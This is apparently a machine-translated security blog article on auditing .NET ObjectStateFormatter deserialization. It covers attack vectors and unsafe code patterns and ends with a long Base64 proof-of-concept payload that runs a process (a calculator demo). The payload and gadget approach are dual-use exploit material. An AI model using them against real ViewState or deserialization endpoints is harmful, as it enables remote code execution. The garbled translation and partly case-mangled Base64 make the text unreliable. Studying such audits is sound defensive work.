. NET advanced code audit of the first ten classes ObjectStateFormatter deserialize vulnerability-vulnerability warning-the black bar safety net

0x00 Preface
ObjectStateFormatter generally used for serialization and deserialization of the state object graph, such as the commonly used ViewState is through this class to do the serialization, is located in the namespace System. Web. The UI, the advantage is that on the basis of the type stored in the pair, the Hashtable data structure, the time sequence of the speed is very fast. But the use of deserializing untrusted binary file causes deserialization vulnerability enabling remote RCE attack, the article author from the principles and the code of audit perspective to do the relevant description and reproduction.
0x01 ObjectStateFormatter serialize
The following by using the ObjectStateFormatter class to serialize an instance to illustrate the problem, first define the TestClass object
! [](/Article/UploadPic/2019-4/201941714137450. png)
Defines three members, and implements a static method ClassMethod start the process. Serialization by creating an object instance, respectively, to assign values to members
! [](/Article/UploadPic/2019-4/201941714138165. png)
With BinaryFormatter, like the conventional case of using the Serialize to obtain the serialization after the binary contents of the file
! [](/Article/UploadPic/2019-4/201941714138757. png)

0x02 ObjectStateFormatter deserialize
2.1, deserialization usage
The reverse sequence of the process is converting binary data to the object, by creating a new object way of calling the Deserialize method to achieve, view the ObjectStateFormatter formatter defined as implements the IFormatter interface
! [](/Article/UploadPic/2019-4/201941714138773. png)
The author by creating a new object call the Deserialize method to achieve the specific implementation code can refer to the following
! [](/Article/UploadPic/2019-4/201941714138430. png)
Deserialize obtained after the TestClass class of members the Name of the value.
! [](/Article/UploadPic/2019-4/201941714138105. png)
2.2, the attack vector—ActivitySurrogateSelector
Since the previous article has introduced the vulnerability principle, so this article is no longer redundant to the narrative, not to see friends, please refer to the. NET advanced code audit, the eighth classes SoapFormatter deserialization vulnerability of, the difference is that with the ObjectStateFormatter class to serialize data, is also by rewriting the ISerializationSurrogate calls the custom code, the author here still using a calculator to do the demo, to generate a binary file is opened after the following figure
! [](/Article/UploadPic/2019-4/201941714138457. png)
As is customary with the ObjectStateFormatter class to Deserialize method to deserialize
! [](/Article/UploadPic/2019-4/201941714139257. png)
Finally deserialized after the success of the pop-up calculator, but also throws an exception, this in the WEB Service case will return a 500 error.
! [](/Article/UploadPic/2019-4/201941714139183. png)
2.3, the attack vector—PSObject
Thanks to the author of the windows host played a CVE-2017-8565 Windows PowerShell remote code execution vulnerability, the patch, the use of unsuccessful, so here is not do the in-depth discussion, interested friends can own research. About the patch details reference:
https://support.microsoft.com/zh-cn/help/4025872/windows-powershell-remote-code-execution-vulnerability

0x03 code audit perspective
3.1, the Deserialize
From the code audit of the angle to find the vulnerability of the EntryPoint, And Deserialize there are two overloads were can deserialize the Stream and string data, where strings can be Raw Raw may also be the document that the Base64 string, both in the actual deserialization can be successful.
! [](/Article/UploadPic/2019-4/201941714139628. png)
The following is unsafe code:
! [](/Article/UploadPic/2019-4/201941714139907. png)
The attacker only needs to control the incoming string parameter to path you can easily achieve the deserialization vulnerabilities.
You can also use the following unsafe code to trigger the vulnerability:
! [](/Article/UploadPic/2019-4/201941714139673. png)
Request Base64 Poc can successfully trigger the pop-up calculator
/wEyxBEAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmvyc2lvbj00ljaumc4wlcbddwx0dxjlpw5ldxryywwsifb1ymxpy0tlevrva2vupwi3n2e1yzu2mtkznguwodkfaqaaaiqbu3lzdgvtlknvbgxly3rpb25zlkdlbmvyawmuu29ydgvku2v0ydfbw1n5c3rlbs5tdhjpbmcsig1zy29ybglilcbwzxjzaw9uptqumc4wljasien1bhr1cmu9bmv1dhjhbcwguhvibgljs2v5vg9rzw49yjc3ytvjntyxotm0zta4ov1dbaaaaavdb3vudahdb21wyxjlcgdwzxjzaw9ubul0zw1zaamabginavn5c3rlbs5db2xszwn0aw9ucy5hzw5lcmljlknvbxbhcmlzb25db21wyxjlcmaxw1ttexn0zw0uu3ryaw5nlcbtc2nvcmxpyiwgvmvyc2lvbj00ljaumc4wlcbddwx0dxjlpw5ldxryywwsifb1ymxpy0tlevrva2vupwi3n2e1yzu2mtkznguwodldxqgcaaaaagaaaakdaaaaagaaaakeaaaabamaaacnavn5c3rlbs5db2xszwn0aw9ucy5hzw5lcmljlknvbxbhcmlzb25db21wyxjlcmaxw1ttexn0zw0uu3ryaw5nlcbtc2nvcmxpyiwgvmvyc2lvbj00ljaumc4wlcbddwx0dxjlpw5ldxryywwsifb1ymxpy0tlevrva2vupwi3n2e1yzu2mtkznguwodldxqeaaaalx2nvbxbhcmlzb24diln5c3rlbs5ezwxlz2f0zvnlcmlhbgl6yxrpb25ib2xkzxijbqaaabeeaaaaagaaaaygaaaacy9jignhbgmuzxhlbgcaaaady21kbauaaaaiu3lzdgvtlkrlbgvnyxrlu2vyawfsaxphdglvbkhvbgrlcgmaaaairgvszwdhdguhbwv0ag9kmadtzxrob2qxawmdmfn5c3rlbs5ezwxlz2f0zvnlcmlhbgl6yxrpb25ib2xkzxirrgvszwdhdgvfbnryes9texn0zw0uumvmbgvjdglvbi5nzw1izxjjbmzvu2vyawfsaxphdglvbkhvbgrlci9texn0zw0uumvmbgvjdglvbi5nzw1izxjjbmzvu2vyawfsaxphdglvbkhvbgrlcgkiaaaacqkaaaajcgaaaaqiaaaamfn5c3rlbs5ezwxlz2f0zvnlcmlhbgl6yxrpb25ib2xkzxirrgvszwdhdgvfbnryeqcaaaaedhlwzqhhc3nlbwjseqz0yxjnzxqsdgfyz2v0vhlwzufzc2vtymx5dnrhcmdldfr5cgvoyw1lcm1ldghvze5hbwunzgvszwdhdgvfbnryeqebagebaqmwu3lzdgvtlkrlbgvnyxrlu2vyawfsaxphdglvbkhvbgrlcitezwxlz2f0zuvudhj5bgsaaacwaln5c3rlbs5gdw5jydnbw1n5c3rlbs5tdhjpbmcsig1zy29ybglilcbwzxjzaw9uptqumc4wljasien1bhr1cmu9bmv1dhjhbcwguhvibgljs2v5vg9rzw49yjc3ytvjntyxotm0zta4ov0sw1n5c3rlbs5tdhjpbmcsig1zy29ybglilcbwzxjzaw9uptqumc4wljasien1bhr1cmu9bmv1dhjhbcwguhvibgljs2v5vg9rzw49yjc3ytvjntyxotm0zta4ov0sw1n5c3rlbs5eawfnbm9zdgljcy5qcm9jzxnzlcbtexn0zw0sifzlcnnpb249nc4wljaumcwgq3vsdhvyzt1uzxv0cmfslcbqdwjsawnlzxlub2tlbj1inzdhnwm1nje5mzrlmdg5xv0gdaaaaettc2nvcmxpyiwgvmvyc2lvbj00ljaumc4wlcbddwx0dxjlpw5ldxryywwsifb1ymxpy0tlevrva2vupwi3n2e1yzu2mtkznguwodkkbg0aaabju3lzdgvtlcbwzxjzaw9uptqumc4wljasien1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5vg9rzw49yjc3ytvjntyxotm0zta4oqyoaaaagln5c3rlbs5eawfnbm9zdgljcy5qcm9jzxnzbg8aaaafu3rhcnqjeaaaaaqjaaaal1n5c3rlbs5szwzszwn0aw9ulk1lbwjlckluzm9tzxjpywxpemf0aw9usg9szgvybwaaaaroyw1ldefzc2vtymx5tmftzqldbgfzc05hbwuju2lnbmf0dxjlclnpz25hdhvyztiktwvtymvyvhlwzrbhzw5lcmljqxjndw1lbnrzaqebaqeaawgnu3lzdgvtllr5cgvbxqkpaaaacq0aaaajdgaaaayuaaaapln5c3rlbs5eawfnbm9zdgljcy5qcm9jzxnzifn0yxj0kfn5c3rlbs5tdhjpbmcsifn5c3rlbs5tdhjpbmcpbhuaaaa%2BU3lzdGVtLkRpYWdub3N0aWNzLlByb2nlc3mgu3rhcnqou3lzdgvtlln0cmluzywgu3lzdgvtlln0cmluzykiaaaacgekaaaacqaaaaywaaaab0nvbxbhcmujdaaaaayyaaaadvn5c3rlbs5tdhjpbmcggqaaactjbnqzmibdb21wyxjlkfn5c3rlbs5tdhjpbmcsifn5c3rlbs5tdhjpbmcpbhoaaaayu3lzdgvtlkluddmyienvbxbhcmuou3lzdgvtlln0cmluzywgu3lzdgvtlln0cmluzykiaaaacgeqaaaacaaaaaybaaaacvn5c3rlbs5db21wyxjpc29uydfbw1n5c3rlbs5tdhjpbmcsig1zy29ybglilcbwzxjzaw9uptqumc4wljasien1bhr1cmu9bmv1dhjhbcwguhvibgljs2v5vg9rzw49yjc3ytvjntyxotm0zta4ov1dcqwaaaakcqwaaaajgaaaaakwaaaacgs=

[1] [2] next